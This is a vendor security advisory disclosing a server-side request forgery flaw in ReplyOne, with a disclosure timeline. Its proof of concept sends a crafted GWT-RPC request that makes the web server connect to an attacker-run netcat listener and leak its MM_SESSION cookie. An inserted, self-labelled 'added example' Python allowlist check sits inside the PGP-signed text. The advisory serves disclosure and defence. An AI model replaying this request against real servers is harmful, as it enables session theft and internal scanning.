-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2024-083
Product: ReplyOne
Manufacturer: Sematell GmbH
Affected Version(s): 7.4.3.0
Tested Version(s): 7.4.3.0
Vulnerability Type: Server-Side Request Forgery (CWE-918)
Risk Level: Medium
Solution Status: Fixed
Manufacturer Notification: 2024-09-23
Public Disclosure: 2025-04-29
CVE Reference: CVE-2024-48907
Author of Advisory: Andreas Grasser, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

ReplyOne is a customer response platform for categorizing and
automatically replying to incoming e-mails. It consists of a web server,
an application server and client software.

The manufacturer describes the product as a "sophisticated customer
support software [that] offers precise categorization and seamless
integration into your existing systems." (see [1]).

Due to a server-side request forgery (SSRF) vulnerability,
low-privileged users can obtain an access token for the back-end server
and further escalate their privileges.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The client-server communication of the application occurs through
Google Web Toolkit Remote Procedure Calls (GWT RPCs), many of which
contain the URL of a back-end server endpoint. Some of these endpoints
are vulnerable to SSRF attacks, which allow an attacker to make the web
server connect to an arbitrary host instead of the application server.

This vulnerability can be used in different malicious ways:

- Bypass of the web server: The web server communicates with the
  application server using a "MM_SESSION" cookie. This cookie can be
  obtained by an attacker, who can then use it to authenticate directly
  against the application server. Although the cookie is associated
  with the attacker's user account, possession of the cookie allows the
  attacker to bypass any checks performed by the web server.
- Internal port scan: The web server responds differently depending on
  whether a connection to the specified TCP port can be established. An
  attacker could use this behavior to conduct a port scan from within
  the server network.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

To reproduce this finding, a netcat listener has to be started on a port
of the attacker system, for example on port 80:

$ nc -lvnp 80
listening on [any] 80 ...

One endpoint which is vulnerable to the SSRF is the "listPermissions"
endpoint. The following request forces the web server to connect to the
attacker's system. The URL of the application server was replaced by the
URL http://:.

POST /desk/AR/user HTTP/1.1
Host: 
Cookie: JSESSIONID=########################;
Content-Length: 256
X-Gwt-Permutation: ################################
Content-Type: text/x-gwt-rpc; charset=UTF-8

7|0|6|https:///desk/AR/|################################|com.attensity.respond.client.services.UserService|listPermissions|com.attensity.respond.shared.common.URIString/1588124183|http://:/rest/sc/151|1|2|3|4|1|5|5|6|

The listener immediately shows an incoming connection from the web
server:

% nc -lvnp 80
[...]
connect to [] from (UNKNOWN) [] 53858
GET /rest/sc/151/permission/all?class= HTTP/1.1
Cookie: $Version=1;MM_SESSION=########-####-4###-####-############::ReplyDeskWeb
Accept: application/json
[...]
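The root cause described above is that a client-controlled URL decides
which host the web server connects to. As an added example, not code
from the advisory, SySS or Sematell, the following Python models the
server-side check that removes that choice from the client: it parses the
text/x-gwt-rpc string table, picks out the URL-typed parameter, and
accepts the call only if that URL matches an allowlisted application-
server origin (scheme, host and port). ReplyOne is a Java/GWT product, so
this is a model of the check rather than the vendor's fix; the host names,
the permutation placeholder, the allowlist and both request bodies are
constructed for illustration.

```python
# Added example (not code from the advisory, SySS or Sematell): an
# allowlist check for the application-server URL carried in a GWT-RPC
# request, with a minimal parser for the text/x-gwt-rpc string table.
# Host names, the permutation placeholder and both bodies are constructed.
from urllib.parse import urlsplit

# Hypothetical allowlist of (scheme, host, port) origins the web server
# may contact. It belongs in server-side configuration; nothing in the
# request may extend it.
ALLOWED_BACKENDS = {
    ("https", "app.internal.example", 443),
}


def parse_gwt_rpc(body: str) -> dict:
    """Decode a text/x-gwt-rpc body into its call components.

    Wire layout: version|flags|count|s1|...|sN|i1|i2|...|
    The integers after the string table are 1-based references into it:
    module base URL, strong name, service, method, parameter count,
    one type reference per parameter, then the parameter values.
    """
    fields = body.split("|")
    if fields and fields[-1] == "":
        fields.pop()                      # the body ends with a '|'
    if len(fields) < 3:
        raise ValueError("not a GWT-RPC body")
    count = int(fields[2])
    table = fields[3:3 + count]
    if len(table) != count:
        raise ValueError("string table shorter than declared")
    tokens = [int(t) if t.lstrip("-").isdigit() else t
              for t in fields[3 + count:]]

    def ref(i):
        # 0 denotes null; other integers index into the string table
        return table[i - 1] if isinstance(i, int) and 0 < i <= count else i

    if len(tokens) < 5:
        raise ValueError("missing call header")
    nparams = tokens[4]
    if not isinstance(nparams, int) or nparams < 0:
        raise ValueError("bad parameter count")
    return {
        "module_base": ref(tokens[0]),
        "service": ref(tokens[2]),
        "method": ref(tokens[3]),
        "param_types": [ref(i) for i in tokens[5:5 + nparams]],
        "values": [ref(i) for i in tokens[5 + nparams:]],
    }


def is_allowed_backend(url: str) -> bool:
    """True only if url names an allowlisted origin exactly.

    The comparison is on the normalised (scheme, host, port) triple, so
    a different port (the port-scan case), another host, an embedded
    userinfo such as https://app.internal.example@203.0.113.10/ and a
    non-HTTP scheme are all rejected. Malformed ports are rejected too.
    """
    try:
        parts = urlsplit(url)
        port = parts.port             # ValueError if not a valid port
    except ValueError:
        return False
    if parts.scheme not in ("http", "https"):
        return False
    if parts.username is not None or parts.password is not None:
        return False
    host = parts.hostname             # already lower-cased by urlsplit
    if not host:
        return False
    if port is None:
        port = 443 if parts.scheme == "https" else 80
    return (parts.scheme, host, port) in ALLOWED_BACKENDS


def url_arguments(call: dict) -> list:
    """Parameter values that are absolute URLs. The module base URL is
    deliberately excluded: it is the web server's own address."""
    return [v for v in call["values"] if isinstance(v, str) and "://" in v]


def request_is_safe(body: str) -> bool:
    """Accept the RPC only if every URL-valued parameter is allowlisted."""
    call = parse_gwt_rpc(body)
    return all(is_allowed_backend(u) for u in url_arguments(call))


# Constructed bodies in the shape of the advisory's PoC request. The
# first points the URIString argument at a documentation-range address
# (203.0.113.10); the second at the configured application server.
_PREFIX = ("7|0|6|https://web.example/desk/AR/|PERMUTATION_PLACEHOLDER|"
           "com.attensity.respond.client.services.UserService|listPermissions|"
           "com.attensity.respond.shared.common.URIString/1588124183|")
SSRF_BODY = _PREFIX + "http://203.0.113.10/rest/sc/151|1|2|3|4|1|5|5|6|"
LEGIT_BODY = _PREFIX + "https://app.internal.example/rest/sc/151|1|2|3|4|1|5|5|6|"

if __name__ == "__main__":
    for name, body in (("ssrf", SSRF_BODY), ("legit", LEGIT_BODY)):
        call = parse_gwt_rpc(body)
        print(name, call["method"], url_arguments(call), request_is_safe(body))
```

Because the port is part of the allowlisted tuple, the internal port-scan
variant is refused as well as the off-host one. The check only covers the
URL as sent: the HTTP client the web server uses must also be configured
not to follow redirects, otherwise an allowlisted host could still forward
the connection elsewhere.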
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2024-09-10: Vulnerability discovered
2024-09-23: Vulnerability reported to manufacturer
2024-09-30: Reported vulnerabilities again as the vendor did not respond
            to the first e-mail
2024-10-31: Asked the manufacturer for updates on the planned fixes as
            the vendor did not respond to the first e-mails
2024-11-04: Manufacturer disagreed with proposed release schedule
2024-11-05: Proposed alternative release schedule
2025-03-03: Asked the vendor for updates
2025-04-16: Proposed release schedule as vendor did not respond to the
            previous e-mail
2025-04-29: Public release of security advisory

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for ReplyOne
    https://www.sematell.com/en/product/features-3/
[2] SySS Security Advisory SYSS-2024-083
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-083.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Andreas Grasser of SySS GmbH.

E-Mail: andreas.grasser@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Andreas_Grasser.asc
Key ID: 0xEBF139DB998B143B
Key Fingerprint: 2EDD 9E86 636E D24A ED7E 3A8A EBF1 39DB 998B 143B

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: https://creativecommons.org/licenses/by/3.0/deed.en

-----BEGIN PGP SIGNATURE-----

iQJMBAEBCgA2FiEELt2ehmNu0krtfjqK6/E525mLFDsFAmgJ2/MYHGFuZHJlYXMu
Z3Jhc3NlckBzeXNzLmRlAAoJEOvxOduZixQ7gbQP/iV9cUQ3CLMJ9Ss3Ov5I9Ft2
0WlrdwEBttTsrCNAS0n3ic1pJdAvJyq5VebbLga2ARt8BwYPIyNwEEQCxFqoXiqw
p5JXTmgnujrWmArxD0RKHNRD++pd+5SsmxBUaFSVGaZ07tkfdFwbxhteZ1JUE+qK
dQ3bCOt9hmLrT13+RRrj8Pr7u+7fGYJtfcn+N7K3L85SjKnNQj7mP4uqKEZmAz5V
wBUUIYv/Zbx5o0VZhDgULUnPf1DCSJzIDFwnwgS23VLKRr8KCjBgFqt8evE0r7nc
cSv9xZp6jg6Mj5J1g8ns24XSsDPPFs8RH+JFNJYQuflRXhgD5h8REOnoGmDR+Xrk
sVtdxjYW4IktAtUXwRc1uB8NzADntRP5Wmy+axtLKERyOpKrz7KK1vFWxOnejCFB
RVO1mwQRDLAhcgOe4qWFQ3QFztP1zY1Cq+CYhL3YsxJVaIxuSWCf7rKkrbdmLFRX
JNBz4xv9ATmyibbu1ydKUAN66Af1Wl62/ZzYjDvVajoUUigNaK7tTnSVUOcou36C
vrTv7OepUuvRgCNlvzjp8NTv8ZDmKrPYjS9dQH2CS+YkJDCqlV1M8rHSiBAqLV8J
IdTCa+2bPbtOu1D/1/sKBKU9zPF8qkNXGJle7e326wsDF669cy32BR20idP9EhIt
bZ7CVUAPhxcGcTSTpIWN
=ZP5y
-----END PGP SIGNATURE-----